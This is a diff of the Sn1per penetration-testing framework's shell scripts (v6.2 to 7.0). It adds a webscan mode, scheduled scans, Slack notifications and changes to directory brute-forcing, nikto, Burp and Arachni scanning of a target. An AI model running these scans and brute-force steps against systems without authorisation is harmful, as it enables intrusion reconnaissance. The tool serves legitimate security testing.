/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:$PORT
|
||||
fi
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -163,7 +173,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
|
@ -171,22 +181,43 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -217,6 +248,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
|
|
@ -255,5 +287,8 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
@ -14,8 +14,12 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
|
|
@ -102,6 +106,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -132,12 +137,17 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:$PORT
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
|
|
@ -173,7 +183,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
|
@ -181,22 +191,43 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
|
||||
fi
|
||||
fi
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -226,6 +257,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
|
||||
fi
|
||||
if [ "$SHOCKER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -258,5 +290,8 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
@ -0,0 +1,84 @@
|
|||
if [ "$MODE" = "webscan" ]; then
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
||||
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
||||
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
||||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
echo -e " ; , "
|
||||
echo -e " ,; '. "
|
||||
echo -e " ;: :; "
|
||||
echo -e " :: :: "
|
||||
echo -e " :: :: "
|
||||
echo -e " ': : "
|
||||
echo -e " :. : "
|
||||
echo -e " ;' :: :: ' "
|
||||
echo -e " .' '; ;' '. "
|
||||
echo -e " :: :; ;: :: "
|
||||
echo -e " ; :;. ,;: :: "
|
||||
echo -e " :; :;: ,;\" :: "
|
||||
echo -e " ::. ':; ..,.; ;:' ,.;: "
|
||||
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
|
||||
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
|
||||
echo -e " .:::.....'\"':::::::'\",...;::::;. "
|
||||
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
|
||||
echo -e " ::' ;::;:::;::.. :; "
|
||||
echo -e " :: ,;:::::::::::;:.. :: "
|
||||
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
|
||||
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
|
||||
echo -e " :. :: ::::::; ::::::: : ; "
|
||||
echo -e " ; :: ::::::: ::::::: : ; "
|
||||
echo -e " ' :: ::::::....:::::' ,: ' "
|
||||
echo -e " ' :: :::::::::::::\" :: "
|
||||
echo -e " :: ':::::::::\"' :: "
|
||||
echo -e " ': \"\"\"\"\"\"\"' :: "
|
||||
echo -e " :: ;: "
|
||||
echo -e " ':; ;:\" "
|
||||
echo -e " -hrr- '; ,;' "
|
||||
echo -e " \"' '\" "
|
||||
echo -e " ''''$RESET"
|
||||
echo ""
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-webscan.txt 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running webscan mode: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$ARACHNI_SCAN" == "1" ]; then
|
||||
mkdir -p $LOOT_DIR/web/http-$TARGET/
|
||||
mkdir -p $LOOT_DIR/web/https-$TARGET/
|
||||
arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
arachni --report-save-path=$LOOT_DIR/web/https-$TARGET/ --output-only-positives https://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-https-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
cd $LOOT_DIR/web/http-$TARGET/
|
||||
cd $LOOT_DIR/web/https-$TARGET/
|
||||
arachni_reporter $LOOT_DIR/web/http-$TARGET/*.afr --report=html:outfile=$LOOT_DIR/web/http-$TARGET/arachni.zip
|
||||
arachni_reporter $LOOT_DIR/web/https-$TARGET/*.afr --report=html:outfile=$LOOT_DIR/web/https-$TARGET/arachni.zip
|
||||
cd $LOOT_DIR/web/http-$TARGET/
|
||||
unzip arachni.zip
|
||||
cd $LOOT_DIR/web/https-$TARGET/
|
||||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
loot
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished webscan mode: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
62
sniper
62
sniper
|
|
@ -3,7 +3,7 @@
|
|||
# + -- --=[https://xerosecurity.com
|
||||
#
|
||||
|
||||
VER="6.2"
|
||||
VER="7.0"
|
||||
INSTALL_DIR="/usr/share/sniper"
|
||||
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
|
|
@ -61,6 +61,9 @@ function help {
|
|||
echo ' [*] HTTPS WEB PORT MODE'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>'
|
||||
echo ""
|
||||
echo ' [*] HTTP WEBSCAN MODE'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode webscan '
|
||||
echo ""
|
||||
echo ' [*] ENABLE BRUTEFORCE'
|
||||
echo ' sniper -t|--target <TARGET> -b|--bruteforce'
|
||||
echo ""
|
||||
|
|
@ -85,9 +88,15 @@ function help {
|
|||
echo ' [*] LOOT REIMPORT FUNCTION'
|
||||
echo ' sniper -w <WORKSPACE_ALIAS> --reimport'
|
||||
echo ""
|
||||
echo ' [*] LOOT REIMPORTALL FUNCTION'
|
||||
echo ' sniper -w <WORKSPACE_ALIAS> --reimportall'
|
||||
echo ""
|
||||
echo ' [*] LOOT REIMPORT FUNCTION'
|
||||
echo ' sniper -w <WORKSPACE_ALIAS> --reload'
|
||||
echo ""
|
||||
echo ' [*] SCHEDULED SCANS'
|
||||
echo ' sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'
|
||||
echo ""
|
||||
echo ' [*] UPDATE SNIPER'
|
||||
echo ' sniper -u|--update'
|
||||
echo ""
|
||||
|
|
@ -237,16 +246,35 @@ case $key in
|
|||
shift # past argument
|
||||
shift # past argument
|
||||
;;
|
||||
-s|--schedule)
|
||||
if [ -z "$WORKSPACE" ]; then
|
||||
echo "You need to set a workspace via the -w switch to schedule a scan task."
|
||||
exit
|
||||
fi
|
||||
SCHEDULE_ARG="$2"
|
||||
if [ "$SCHEDULE_ARG" = "daily" ] || [ "$SCHEDULE_ARG" = "weekly" ] || [ "$SCHEDULE_ARG" = "monthly" ]; then
|
||||
SCHEDULE_TASK="$WORKSPACE_DIR/scans/scheduled/$SCHEDULE_ARG.sh"
|
||||
vim $SCHEDULE_TASK
|
||||
cat $WORKSPACE_DIR/scans/scheduled/*.sh 2> /dev/null
|
||||
exit
|
||||
else
|
||||
echo "You need to specify either daily, weekly or monthly for the scheduled scan argument."
|
||||
exit
|
||||
fi
|
||||
shift # past argument
|
||||
shift # past argument
|
||||
;;
|
||||
-d|--delete)
|
||||
echo "Do you want to remove the workspace? $WORKSPACE_DIR"
|
||||
read ANS
|
||||
logo
|
||||
echo "Are you sure you want to remove the following workspace? (Hit Ctrl+C to exit): /usr/share/sniper/loot/workspace/$WORKSPACE/"
|
||||
read ANS
|
||||
rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/
|
||||
echo "Workspace /usr/share/sniper/loot/workspace/$WORKSPACE/ was removed."
|
||||
exit
|
||||
shift # past argument
|
||||
;;
|
||||
-dh|--delete-host)
|
||||
echo "Do you want to remove $TARGET from $WORKSPACE?"
|
||||
read ANS
|
||||
echo "Removing $TARGET from $WORKSPACE"
|
||||
sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt $WORKSPACE_DIR/domains/targets.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null
|
||||
sniper --reimport -w $WORKSPACE
|
||||
|
|
@ -314,29 +342,35 @@ function init {
|
|||
mkdir $LOOT_DIR/credentials 2> /dev/null
|
||||
mkdir $LOOT_DIR/web 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir -p $LOOT_DIR/scans/scheduled/ 2> /dev/null
|
||||
touch $LOOT_DIR/scans/scheduled/daily.sh 2> /dev/null
|
||||
touch $LOOT_DIR/scans/scheduled/weekly.sh 2> /dev/null
|
||||
touch $LOOT_DIR/scans/scheduled/monthly.sh 2> /dev/null
|
||||
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
|
||||
/etc/init.d/metasploit start 2> /dev/null > /dev/null 2>&1 &
|
||||
msfdb start 2> /dev/null > /dev/null
|
||||
|
||||
if [ "$AUTOBRUTE" == "1" ]; then
|
||||
echo "$TARGET autobrute `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-autobrute.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$FULLNMAPSCAN" == "1" ]; then
|
||||
echo "$TARGET fullnmapscan `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-fullnmapscan.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$OSINT" == "1" ]; then
|
||||
echo "$TARGET osint `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-osint.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$RECON" == "1" ]; then
|
||||
echo "$TARGET recon `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
|
||||
fi
|
||||
}
|
||||
|
||||
# REMOVE HOST FROM WORKSPACE sed -i "/www.test.com/d" domains/targets-all-sorted.txt domains/domains-all-sorted.txt domains/targets.txt
|
||||
function loot {
|
||||
echo -e "$OKRED ____ $RESET"
|
